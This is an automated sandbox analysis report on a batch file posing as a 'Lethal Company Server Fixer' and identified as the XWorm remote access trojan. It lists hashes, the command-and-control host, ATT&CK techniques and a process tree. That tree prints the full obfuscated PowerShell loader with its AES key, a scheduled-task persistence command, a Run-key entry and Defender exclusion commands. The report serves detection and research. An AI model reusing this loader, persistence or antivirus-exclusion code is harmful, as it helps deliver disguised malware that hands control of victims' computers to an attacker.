xworm | fb02b44b720c9a40344758299c29364fdc86fa685ee5457b2e625ddf528dae28

Analysis

max time kernel
77s
max time network
80s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
26/07/2024, 13:03

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Lethal Company Server Fixer.bat
Size

482KB
MD5

8cecf4c9b8653a9885bc14260c674fec
SHA1

2038ebc58360fad62968f0e3ec7ea4e938384aa5
SHA256

fb02b44b720c9a40344758299c29364fdc86fa685ee5457b2e625ddf528dae28
SHA512

c183f8b6d6f0133f7fa3c378f0bff72880d6f74fff05353d9833d038d88e02aab9b9eb8d007f2d8d76e3d66945cfba7672dc96cd28a5ba9bda026ec62f7bdbb4
SSDEEP

12288:W6UIUDXaIHSj870S7xNL0bWrTpA43+r+vFf4mSJGKlc:WCUDXRSe0Y9AVKFgmSJGKlc

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

hard-tyler.gl.at.ply.gg:27490

Attributes

Install_directory
%Temp%
install_file
systemprocess.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3564-48-0x0000028BE9480000-0x0000028BE94D0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	3564	powershell.exe
4	3564	powershell.exe
5	3564	powershell.exe
7	3564	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3520	powershell.exe
1176	powershell.exe
3564	powershell.exe
3440	powershell.exe
1120	powershell.exe
3368	powershell.exe
4140	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "198"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
3520	powershell.exe
3520	powershell.exe
1176	powershell.exe
1176	powershell.exe
3564	powershell.exe
3564	powershell.exe
3440	powershell.exe
3440	powershell.exe
1120	powershell.exe
1120	powershell.exe
3368	powershell.exe
3368	powershell.exe
4140	powershell.exe
4140	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeIncreaseQuotaPrivilege	1176	powershell.exe
Token: SeSecurityPrivilege	1176	powershell.exe
Token: SeTakeOwnershipPrivilege	1176	powershell.exe
Token: SeLoadDriverPrivilege	1176	powershell.exe
Token: SeSystemProfilePrivilege	1176	powershell.exe
Token: SeSystemtimePrivilege	1176	powershell.exe
Token: SeProfSingleProcessPrivilege	1176	powershell.exe
Token: SeIncBasePriorityPrivilege	1176	powershell.exe
Token: SeCreatePagefilePrivilege	1176	powershell.exe
Token: SeBackupPrivilege	1176	powershell.exe
Token: SeRestorePrivilege	1176	powershell.exe
Token: SeShutdownPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeSystemEnvironmentPrivilege	1176	powershell.exe
Token: SeRemoteShutdownPrivilege	1176	powershell.exe
Token: SeUndockPrivilege	1176	powershell.exe
Token: SeManageVolumePrivilege	1176	powershell.exe
Token: 33	1176	powershell.exe
Token: 34	1176	powershell.exe
Token: 35	1176	powershell.exe
Token: 36	1176	powershell.exe
Token: SeIncreaseQuotaPrivilege	1176	powershell.exe
Token: SeSecurityPrivilege	1176	powershell.exe
Token: SeTakeOwnershipPrivilege	1176	powershell.exe
Token: SeLoadDriverPrivilege	1176	powershell.exe
Token: SeSystemProfilePrivilege	1176	powershell.exe
Token: SeSystemtimePrivilege	1176	powershell.exe
Token: SeProfSingleProcessPrivilege	1176	powershell.exe
Token: SeIncBasePriorityPrivilege	1176	powershell.exe
Token: SeCreatePagefilePrivilege	1176	powershell.exe
Token: SeBackupPrivilege	1176	powershell.exe
Token: SeRestorePrivilege	1176	powershell.exe
Token: SeShutdownPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeSystemEnvironmentPrivilege	1176	powershell.exe
Token: SeRemoteShutdownPrivilege	1176	powershell.exe
Token: SeUndockPrivilege	1176	powershell.exe
Token: SeManageVolumePrivilege	1176	powershell.exe
Token: 33	1176	powershell.exe
Token: 34	1176	powershell.exe
Token: 35	1176	powershell.exe
Token: 36	1176	powershell.exe
Token: SeIncreaseQuotaPrivilege	1176	powershell.exe
Token: SeSecurityPrivilege	1176	powershell.exe
Token: SeTakeOwnershipPrivilege	1176	powershell.exe
Token: SeLoadDriverPrivilege	1176	powershell.exe
Token: SeSystemProfilePrivilege	1176	powershell.exe
Token: SeSystemtimePrivilege	1176	powershell.exe
Token: SeProfSingleProcessPrivilege	1176	powershell.exe
Token: SeIncBasePriorityPrivilege	1176	powershell.exe
Token: SeCreatePagefilePrivilege	1176	powershell.exe
Token: SeBackupPrivilege	1176	powershell.exe
Token: SeRestorePrivilege	1176	powershell.exe
Token: SeShutdownPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeSystemEnvironmentPrivilege	1176	powershell.exe
Token: SeRemoteShutdownPrivilege	1176	powershell.exe
Token: SeUndockPrivilege	1176	powershell.exe
Token: SeManageVolumePrivilege	1176	powershell.exe
Token: 33	1176	powershell.exe
Token: 34	1176	powershell.exe
Token: 35	1176	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3564	powershell.exe
3008	LogonUI.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 3520	5112	cmd.exe	83
PID 5112 wrote to memory of 3520	5112	cmd.exe	83
PID 3520 wrote to memory of 1176	3520	powershell.exe	84
PID 3520 wrote to memory of 1176	3520	powershell.exe	84
PID 3520 wrote to memory of 3036	3520	powershell.exe	87
PID 3520 wrote to memory of 3036	3520	powershell.exe	87
PID 3036 wrote to memory of 1316	3036	WScript.exe	88
PID 3036 wrote to memory of 1316	3036	WScript.exe	88
PID 1316 wrote to memory of 3564	1316	cmd.exe	90
PID 1316 wrote to memory of 3564	1316	cmd.exe	90
PID 3564 wrote to memory of 3440	3564	powershell.exe	91
PID 3564 wrote to memory of 3440	3564	powershell.exe	91
PID 3564 wrote to memory of 1120	3564	powershell.exe	93
PID 3564 wrote to memory of 1120	3564	powershell.exe	93
PID 3564 wrote to memory of 3368	3564	powershell.exe	95
PID 3564 wrote to memory of 3368	3564	powershell.exe	95
PID 3564 wrote to memory of 4140	3564	powershell.exe	97
PID 3564 wrote to memory of 4140	3564	powershell.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Lethal Company Server Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMlg9Ak1Hll/hT/bcKwaGaEvEkdKEZUGXwpk1I254bI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yXy71lPve3rWJaY/gGktow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uXiyu=New-Object System.IO.MemoryStream(,$param_var); $MCbki=New-Object System.IO.MemoryStream; $iUPGp=New-Object System.IO.Compression.GZipStream($uXiyu, [IO.Compression.CompressionMode]::Decompress); $iUPGp.CopyTo($MCbki); $iUPGp.Dispose(); $uXiyu.Dispose(); $MCbki.Dispose(); $MCbki.ToArray();}function execute_function($param_var,$param2_var){ $Lbesm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kkMCs=$Lbesm.EntryPoint; $kkMCs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Lethal Company Server Fixer.bat';$OewKT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Lethal Company Server Fixer.bat').Split([Environment]::NewLine);foreach ($xtRuP in $OewKT) { if ($xtRuP.StartsWith(':: ')) { $BHBtz=$xtRuP.Substring(3); break; }}$payloads_var=[string[]]$BHBtz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_712_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_712.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_712.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_712.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMlg9Ak1Hll/hT/bcKwaGaEvEkdKEZUGXwpk1I254bI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yXy71lPve3rWJaY/gGktow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uXiyu=New-Object System.IO.MemoryStream(,$param_var); $MCbki=New-Object System.IO.MemoryStream; $iUPGp=New-Object System.IO.Compression.GZipStream($uXiyu, [IO.Compression.CompressionMode]::Decompress); $iUPGp.CopyTo($MCbki); $iUPGp.Dispose(); $uXiyu.Dispose(); $MCbki.Dispose(); $MCbki.ToArray();}function execute_function($param_var,$param2_var){ $Lbesm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kkMCs=$Lbesm.EntryPoint; $kkMCs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_712.bat';$OewKT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_712.bat').Split([Environment]::NewLine);foreach ($xtRuP in $OewKT) { if ($xtRuP.StartsWith(':: ')) { $BHBtz=$xtRuP.Substring(3); break; }}$payloads_var=[string[]]$BHBtz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3564
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1120
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3368
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2748

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:1864

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a25055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb15ee5741b379245ca8549cb0d4ecf8

SHA1
3555273945abda3402674aea7a4bff65eb71a783

SHA256
b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

SHA512
1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f8c40f7624e23fa92ae2f41e34cfca77

SHA1
20e742cfe2759ac2adbc16db736a9e143ca7b677

SHA256
c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

SHA512
f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rydeowsw.gem.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_712.bat

Filesize
482KB

MD5
8cecf4c9b8653a9885bc14260c674fec

SHA1
2038ebc58360fad62968f0e3ec7ea4e938384aa5

SHA256
fb02b44b720c9a40344758299c29364fdc86fa685ee5457b2e625ddf528dae28

SHA512
c183f8b6d6f0133f7fa3c378f0bff72880d6f74fff05353d9833d038d88e02aab9b9eb8d007f2d8d76e3d66945cfba7672dc96cd28a5ba9bda026ec62f7bdbb4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_712.vbs

Filesize
115B

MD5
bb9282b7d487036cc6afb25149bc3231

SHA1
e6f7192fbb6c5244c8053adaa4ac9b8a03c2aa10

SHA256
63752c40d1269af47bed2643d3ab79cd27ce50e46d23ff1ed016ea15013231e4

SHA512
05df2db6878838e2ca25e1431cab5101883172c43619f27cb13be770f6c8b69ce50c38028e7f9f56333856958c40b703c0efe461986a4d3139170c55be173733

Download Submit
memory/1176-30-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/1176-24-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/1176-26-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/1176-27-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/1176-25-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/3520-92-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/3520-14-0x00000209A4EA0000-0x00000209A4EFC000-memory.dmp

Filesize
368KB

Download
memory/3520-13-0x00000209A4C50000-0x00000209A4C58000-memory.dmp

Filesize
32KB

Download
memory/3520-12-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/3520-11-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/3520-10-0x00007FFF89290000-0x00007FFF89D52000-memory.dmp

Filesize
10.8MB

Download
memory/3520-9-0x00000209A4C10000-0x00000209A4C32000-memory.dmp

Filesize
136KB

Download
memory/3520-0-0x00007FFF89293000-0x00007FFF89295000-memory.dmp

Filesize
8KB

Download
memory/3520-93-0x00007FFF89293000-0x00007FFF89295000-memory.dmp

Filesize
8KB

Download
memory/3564-48-0x0000028BE9480000-0x0000028BE94D0000-memory.dmp

Filesize
320KB

Download
memory/3564-94-0x0000028BE95E0000-0x0000028BE95EC000-memory.dmp

Filesize
48KB

Download
memory/3564-106-0x0000028BE9D00000-0x0000028BE9DB0000-memory.dmp

Filesize
704KB

Download
memory/3564-107-0x0000028BEB080000-0x0000028BEB5A8000-memory.dmp

Filesize
5.2MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads